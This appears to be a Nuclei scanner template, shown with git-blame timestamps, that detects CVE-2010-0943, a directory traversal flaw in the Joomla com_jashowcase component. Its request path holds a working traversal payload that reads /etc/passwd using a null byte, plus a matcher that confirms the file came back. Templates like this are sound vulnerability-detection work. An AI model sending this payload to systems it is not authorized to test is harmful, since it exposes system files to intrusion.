2021-08-15 23:28:46 +00:00
id : CVE-2010-0943
info :
name : Joomla! Component com_jashowcase - Directory Traversal
author : daffainfo
severity : high
2022-02-13 19:08:26 +00:00
description : A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
2022-02-13 19:15:26 +00:00
remediation : Apply all relevant security patches and product upgrades.
2021-08-19 13:59:12 +00:00
reference :
2021-08-15 23:28:46 +00:00
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags : cve,cve2010,joomla,lfi
2022-02-13 19:08:26 +00:00
classification :
2022-02-13 19:15:26 +00:00
cve-id : CVE-2010-0943
2021-08-15 23:28:46 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
- type : status
status :
- 200
2022-02-13 19:08:26 +00:00
# Enhanced by mp on 2022/02/13